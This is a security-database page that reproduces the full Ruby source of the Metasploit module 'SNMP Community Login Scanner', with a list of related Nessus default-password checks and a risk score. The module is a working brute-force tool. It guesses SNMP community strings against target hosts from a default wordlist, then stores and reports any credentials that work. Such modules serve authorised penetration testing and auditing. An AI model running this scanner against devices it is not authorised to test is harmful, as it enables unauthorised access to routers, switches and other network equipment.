SNMP Community Login Scanner

🗓️ 31 Aug 2024 00:00:00Reported by H D Moore, metasploit.comType

packetstorm🔗 packetstormsecurity.com👁 507 Views

SNMP Community Login Scanner module for logging into SNMP devices using common community names

Reporter	Title	Published	Views	Family All 77
Tenable Nessus	3Com Superstack 3 Switch Multiple Default Accounts	29 Aug 200100:00	–	nessus
Tenable Nessus	Bay Networks Accelar 1200 Switch Default Password (password) for 'usrname' Account	3 Jun 200500:00	–	nessus
Tenable Nessus	Allied Telesyn Router/Switch Default Password	3 Jun 200500:00	–	nessus
Tenable Nessus	Allied Telesyn Router/Switch Web Interface Default Password	3 Jun 200500:00	–	nessus
Tenable Nessus	Avaya P330 Stackable Switch Default Password	28 Mar 200500:00	–	nessus
Tenable Nessus	Cisco Device Default Password	23 Dec 200600:00	–	nessus
Tenable Nessus	Cisco Multiple Devices Unpassworded Account	7 Sep 200100:00	–	nessus
Tenable Nessus	AirConnect Default Password	22 May 200200:00	–	nessus
Tenable Nessus	Enhydra Multiserver Default Password	22 Jan 200300:00	–	nessus
Tenable Nessus	F5 Device Default Support Password	6 Dec 200100:00	–	nessus

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
require 'metasploit/framework/community_string_collection'  
require 'metasploit/framework/login_scanner/snmp'  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Auxiliary::Report  
include Msf::Auxiliary::Scanner  
include Msf::Auxiliary::AuthBrute  
  
def initialize  
super(  
'Name' => 'SNMP Community Login Scanner',  
'Description' => %q{  
This module logs in to SNMP devices using common community names.  
},  
'Author' => 'hdm',  
'References' =>  
[  
[ 'CVE', '1999-0508' ], # Weak password  
[ 'CVE', '1999-0517' ],  
[ 'CVE', '1999-0516' ],  
],  
'License' => MSF_LICENSE  
)  
  
register_options(  
[  
Opt::RPORT(161),  
OptEnum.new('PROTOCOL', [true, 'The SNMP protocol to use', 'udp', ['udp', 'tcp']]),  
OptEnum.new('VERSION', [true, 'The SNMP version to scan', '1', ['1', '2c', 'all']]),  
OptString.new('PASSWORD', [ false, 'The password to test' ]),  
OptPath.new('PASS_FILE', [ false, "File containing communities, one per line",  
File.join(Msf::Config.data_directory, "wordlists", "snmp_default_pass.txt")  
])  
])  
  
deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE')  
end  
  
# Operate on a single host so that we can take advantage of multithreading  
def run_host(ip)  
  
collection = Metasploit::Framework::CommunityStringCollection.new(  
pass_file: datastore['PASS_FILE'],  
password: datastore['PASSWORD']  
)  
  
scanner = Metasploit::Framework::LoginScanner::SNMP.new(  
configure_login_scanner(  
host: ip,  
port: rport,  
protocol: datastore['PROTOCOL'],  
cred_details: collection,  
stop_on_success: datastore['STOP_ON_SUCCESS'],  
bruteforce_speed: datastore['BRUTEFORCE_SPEED'],  
version: datastore['VERSION'],  
framework: framework,  
framework_module: self,  
queue_size: 100  
)  
)  
  
scanner.scan! do |result|  
credential_data = result.to_h  
credential_data.merge!(  
module_fullname: self.fullname,  
workspace_id: myworkspace_id  
)  
if result.success?  
credential_core = create_credential(credential_data)  
credential_data[:core] = credential_core  
create_credential_login(credential_data)  
  
print_good "#{ip}:#{rport} - Login Successful: #{result.credential} (Access level: #{result.access_level}); Proof (sysDescr.0): #{result.proof}"  
report_service(  
:host => ip,  
:port => rport,  
:proto => 'udp',  
:name => 'snmp',  
:info => result.proof,  
:state => 'open'  
)  
else  
invalidate_login(credential_data)  
print_error "#{ip}:#{rport} - LOGIN FAILED: #{result.credential} (#{result.status})"  
end  
end  
end  
  
def rport  
datastore['RPORT']  
end  
  
def protocol  
datastore['PROTOCOL']  
end  
  
  
  
  
end  
`

31 Aug 2024 00:00Current

6.9Medium risk

Vulners AI Score6.9

EPSS0.89585